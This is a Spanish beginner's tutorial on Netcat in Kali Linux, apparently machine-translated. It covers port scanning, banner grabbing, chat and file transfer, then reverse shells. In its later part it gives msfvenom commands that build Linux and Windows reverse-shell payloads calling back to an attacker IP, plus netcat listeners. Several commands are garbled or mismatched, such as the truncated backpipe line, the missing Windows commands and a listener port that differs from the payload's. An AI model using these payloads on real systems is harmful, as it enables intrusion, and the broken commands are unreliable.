Tutoriales

Netcat — Una guía general para principiantes y avanzados

Usualmente usamos Netcat para obtener un shell inverso, pero cualquier cosa es posible, desde escaneo de puertos y transferencias de archivos hasta captura y explotación de banners. gato neto.

En esta guía detallada nuestra, veremos por qué Netcat se llama «Navaja suiza de hacker«. En esta guía detallada nuestra, aprenderemos gato neto existir kali linux de principio a fin.

Netcat, también conocido como nc, es una utilidad de red para leer y escribir conexiones de red mediante TCP y UDP. Netcat es muy útil tanto para auditores de seguridad de redes como de ataques.
Para fines de ataque, es una herramienta múltiple precisa y útil. Los auditores de seguridad usan Netcat para depurar e investigar redes.
Para comenzar con netcat, solo necesitamos consultar la sección de ayuda de netcat con:

nc -h

La siguiente captura de pantalla muestra el resultado del comando anterior:

opciones de ayuda de netcat

Netcat se puede utilizar como un escáner de puertos. Netcat no se creó para escanear puertos, pero si usamos el indicador -z, podemos hacerlo. El indicador -z se usa para escanear el demonio de lista sin enviar ningún dato. Esto hace posible saber qué tipo de servicio se está ejecutando en ese puerto en particular. Netcat puede realizar escaneos TCP y UDP.

Escaneo TCP con Netcat

Para escanear la máquina de destino, ejecutamos el siguiente comando:

nc -v -n -z 192.168.122.48 10-400

Aquí usamos algunos indicadores, el indicador -v es para el modo detallado, -n para direcciones IP puramente numéricas y -z para el modo de E/S cero (principalmente para escanear).
También necesitamos especificar un rango de puertos (10 a 400) y obtenemos el resultado que se muestra en la imagen a continuación:

Escanear puertos TCP con Netcat

En la captura de pantalla anterior, podemos ver que la conexión del puerto cerrado se rechaza y la conexión del puerto TCP abierto es exitosa. De esta forma podemos escanear puertos TCP a través de Netcat.

Escaneo UDP con Netcat

También podemos usar Netcat para escanear puertos UDP. Con la ayuda del siguiente comando, escaneamos el puerto UDP usando netcat.

nc -vzu 192.168.122.48 20-100

Aquí, usamos el indicador -u para buscar puertos UDP, como se muestra en la siguiente captura de pantalla:

Escaneo de puertos UDP con netcat

Dos usuarios pueden chatear a través de netcat. Pero antes de eso, necesitan establecer una conexión. Para configurar todo esto, usaremos dos dispositivos diferentes. Un sistema operativo es Elementary OS y el otro es nuestro fabuloso Kali. Para establecer una conexión, necesitamos saber la dirección IP del sistema (en nuestro caso, usamos la IP local).
Podemos iniciar el lanzador desde un dispositivo. Iniciamos el lanzador ejecutando el siguiente comando desde Elementary OS:

nc 192.168.225.54 12345

La dirección IP aquí es la dirección IP local de nuestro sistema operativo elemental, elegimos el número de puerto 12345 solo como ejemplo. Como podemos ver en la siguiente captura de pantalla:

Chatear usando netcat en sistemas operativos básicos

Ahora desde nuestro Kali Linux, usamos el siguiente comando para iniciar el oyente.

nc -lvp 1234

Aquí, el indicador -l es para el modo de escucha, v para el modo detallado yp para el puerto local.

Ahora que se ha establecido la conexión, ambos sistemas pueden comunicarse entre sí.

Si no estamos en la red local, podemos usar nuestra IP externa en lugar de la IP local y reenviar el puerto de nuestra elección en el sistema iniciador.

Chatear con netcat en Kali Linux

El raspado de banners recopila información del host. También podemos hacerlo mediante netcat. Ejecutamos el siguiente comando para ver información sobre los servicios que se ejecutan en un puerto específico:

nc 192.168.122.48 21

En la captura de pantalla a continuación, podemos ver la versión del servicio que se ejecuta en el puerto.

Raspado de banners con Netcat

En la captura de pantalla anterior, podemos ver que está ejecutando vsFTPd versión 2.3.4.

Netcat también brinda la capacidad de transferir o compartir archivos desde un dispositivo a otros dispositivos. Esto es muy similar al proceso de enviar un texto.

Tenemos un archivo de texto llamado file.txt en nuestro sistema Kali Linux, para compartirlo usamos el siguiente comando:

nc -lvp 2345 < file.txt

La siguiente captura de pantalla muestra el inicio del recorte.

cortar archivos con netcat

Ahora podemos descargarlo desde otro sistema. Aquí hay un ejemplo, estamos usando el terminal Termux en nuestro dispositivo Android. En otros dispositivos, necesitamos ejecutar el siguiente comando para guardar el archivo. Aquí necesitamos la dirección IP de nuestra máquina Kali Linux (estamos usando la IP local).

nc 192.168.225.54 2345 > file.txt

Lo podemos ver en la siguiente captura de pantalla:

Transferir archivos usando netcat

La pantalla anterior muestra la salida de Kali Linux, y la mitad inferior de la captura de pantalla anterior muestra el archivo que recibimos en nuestro dispositivo Android usando Netcat.

Todo el mundo sabe que netcat juega un papel importante en la explotación de la máquina de destino. Esto es muy útil para los jugadores de CTF y los cazarrecompensas. Esto también funciona para las cargas útiles de Metasploit.

shell inverso de linux

Podemos crear fácilmente un shell inverso con la ayuda de "msfvenom" y configurar un oyente usando netcat. Para el sistema Linux como destino, podemos usar el siguiente comando:

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.122.1 lport=6666 R

Aquí usamos el indicador R para generar la carga útil sin procesar (solo comando).

Después de crear el payload, solo necesitamos ejecutarlo en la máquina de destino, pero antes de eso, iniciamos el escucha de netcat en la máquina atacante con el siguiente comando:

nc -lvp 666

Cada vez que el objetivo ejecuta la carga útil, obtenemos la sesión. Lo podemos ver en la siguiente captura de pantalla:

Use netcat para obtener un shell de linux

A veces, por razones de seguridad, es posible que no podamos obtener la sesión con el método anterior. En este caso, podemos iniciar netcat listener en el puerto 443 con el siguiente comando:

nc -lvp 443

Luego, solo necesitamos ejecutar el siguiente comando en la máquina Linux de destino:

mknod /tmp/backpipe p
/bin/sh 0/tmp/backpipe

¡auge! ¡Tenemos conchas marinas!

Conexión inversa de Windows

Podemos obtener fácilmente el símbolo del sistema del sistema Windows de destino en la máquina atacante.

Para hacer esto, solo necesitamos iniciar el oyente en la máquina atacante (Kali Linux) aplicando el siguiente comando:

En el sistema Windows de destino, solo necesitamos ejecutar el siguiente comando en el símbolo del sistema (Windows CMD):

A continuación, podemos obtener fácilmente el símbolo del sistema de la máquina de destino en la terminal del atacante. Como podemos ver en la siguiente captura de pantalla:

Shell inverso de Windows usando Netcat

Si necesitamos crear una carga útil en un archivo .exe, entonces debemos crear la carga útil "msfvenom" aplicando el siguiente comando:

msfvenom -p windows/shell_reverse_tcp lhost=192.168.122.1 lport=4444 –f exe > shell.exe

Este comando creará un archivo shell.exe. Si el sistema Windows de destino ejecuta el archivo exe, obtenemos un shell al abrir un oyente en ese puerto en particular.

También podemos crear Puertas traseras persistentes en Windows Usa Netcat.

gato neto Muy importante para expertos en ciberseguridad y cazarrecompensas de errores. Podemos hacer casi cualquier cosa con Netcat.Esperamos tener una idea clara de Netcat y su finalidad kali linux.

¿Te gustan nuestros artículos?Cerciorarse Síganos superior Gorjeo y GitHub, donde publicamos actualizaciones de artículos.Únete a nosotros KaliLinuxEn familia, únete a nosotros grupo de telegramasEstamos trabajando arduamente para construir una comunidad para Linux y la seguridad de la red.Para cualquier cosa, siempre estamos felices de ayudar a todos. Área de comentariosComo sabemos, nuestra sección de comentarios siempre está abierta a todo el mundo.Leemos cada comentario y siempre respondemos.

LEER  Cómo solucionar el problema de inicio de sesión después de eliminar zsh de Debian / Ubuntu

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba